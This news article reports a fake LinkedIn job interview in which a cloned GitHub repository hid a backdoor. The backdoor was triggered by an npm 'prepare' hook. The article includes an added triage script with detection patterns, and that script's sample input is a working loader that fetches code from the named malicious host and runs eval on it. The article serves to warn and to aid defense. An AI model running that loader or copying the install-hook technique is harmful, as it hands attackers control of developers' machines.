Technology · Jun 16, 2026 · 2 min read

The Fake Interview on LinkedIn Hides Malware: 'They Asked Me to Analyze the Code'

A computer engineer detected and blocked a cyber intrusion attempt orchestrated through a fake job offer on LinkedIn. The attackers, posing as recruiters from a startup operating in the cryptocurrency sector, contacted him requesting a technical review of source code hosted in a public GitHub repository.

The trap was hidden behind a request to analyze a supposed issue with deprecated Node modules. A thorough analysis of the code, conducted in an isolated virtual environment on a Hetzner VPS, instead revealed a backdoor designed to take control of the victim's machine. As the victim himself, Roman Imankulov, explained in a blog post, the malicious logic lived in the file app/test/index.js, disguised among roughly 250 lines of code structured to look like an ordinary software test suite.

Malware via LinkedIn: The Automatic Activation Mechanism via NPM

Examining the script shows how the application reconstructs a specific web address by concatenating string fragments: the defined values include the HTTPS protocol, the store domain, the rest-icon-handler subdomain, and the path /icons/77. Once a connection to the remote host https://rest-icon-handler.store/icons/77 is established, the code hidden among commented-out test lines executes whatever payload the server sends directly on the local system.

Activating the threat does not require running the tests manually. The main file app/index.js calls the malicious module directly. The real crux of the attack, however, lies in the package.json configuration, where the prepare script is bound to the command node app/index.js. Because npm automatically runs the prepare script right after npm install completes, the infection is triggered the moment the developer downloads the project's dependencies. The invitation to check the deprecated modules served as bait to get this command executed.
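As an added example that is not from the article or from Imankulov's own post, the following pre-install triage script covers the two mechanisms just described: the package.json hook that npm runs unprompted, and a URL assembled from string fragments and handed to a code-executing primitive. The file contents, names and detection heuristics are constructed assumptions for the example, not the article's.

```javascript
// Added example (not from the article or Imankulov's post): pre-install triage
// of a cloned Node project. Lists the package.json hooks that a bare
// `npm install` runs unprompted and scans a source file for the loader shape
// described above. Heuristics and sample inputs are constructed assumptions.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall", "prepare", "prepublish"];

// Lifecycle scripts that `npm install` with no arguments executes automatically
// (`npm install --ignore-scripts` suppresses them while you review the code).
function installTimeHooks(packageJsonText) {
  const scripts = JSON.parse(packageJsonText).scripts || {};
  return INSTALL_HOOKS.filter((h) => h in scripts).map((h) => `${h}: ${scripts[h]}`);
}

// Primitives that turn fetched text into running code.
const REMOTE_EXEC = /\beval\s*\(|new\s+Function\s*\(|child_process|vm\.runIn\w*Context/;
// Literal shapes that only make sense as pieces of a URL joined at runtime.
const URL_PIECE = /^(https?:\/\/|\.[a-z]{2,6}|\/[\w\/-]+)$/;

function scanSource(sourceText) {
  const findings = [];
  const literals = [...sourceText.matchAll(/["'`]([^"'`\n]*)["'`]/g)].map((m) => m[1]);
  const pieces = literals.filter((s) => URL_PIECE.test(s));
  // A bare scheme plus at least one other piece is the split-URL pattern.
  if (pieces.some((s) => s.startsWith("http")) && pieces.length >= 2) {
    findings.push(`url-fragments: ${pieces.join(" | ")}`);
  }
  sourceText.split("\n").forEach((line, i) => {
    if (REMOTE_EXEC.test(line)) findings.push(`remote-exec line ${i + 1}: ${line.trim()}`);
  });
  return findings;
}

// Constructed stand-ins for the repository files the article describes.
const SAMPLE_PACKAGE_JSON = JSON.stringify({
  name: "icon-handler", scripts: { test: "jest", prepare: "node app/index.js" },
});
const SAMPLE_INDEX_JS = [
  'const https = require("https");',
  'const a = "https://", b = "rest-icon-handler", c = ".store", d = "/icons/77";',
  '// describe("icons", () => { it("renders", () => expect(1).toBe(1)); });',
  'https.get(a + b + c + d, (res) => { let body = ""; res.on("data", (x) => body += x);',
  '  res.on("end", () => eval(body)); });',
  '// describe("handler", () => { it("resolves", () => expect(true).toBe(true)); });',
].join("\n");

function triage(packageJsonText, sourceText) {
  return { hooks: installTimeHooks(packageJsonText), findings: scanSource(sourceText) };
}

console.log(JSON.stringify(triage(SAMPLE_PACKAGE_JSON, SAMPLE_INDEX_JS), null, 2));
```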

The social engineering operation relies on several stolen identities to get past the victim's defenses. The GitHub history showed 39 commits, all attributed to the real profile of a full-stack developer unrelated to the incident, who confirmed that his identity had already been cloned in the past. The malicious software has been reported to GitHub and the fake account to LinkedIn, but the code remains accessible online.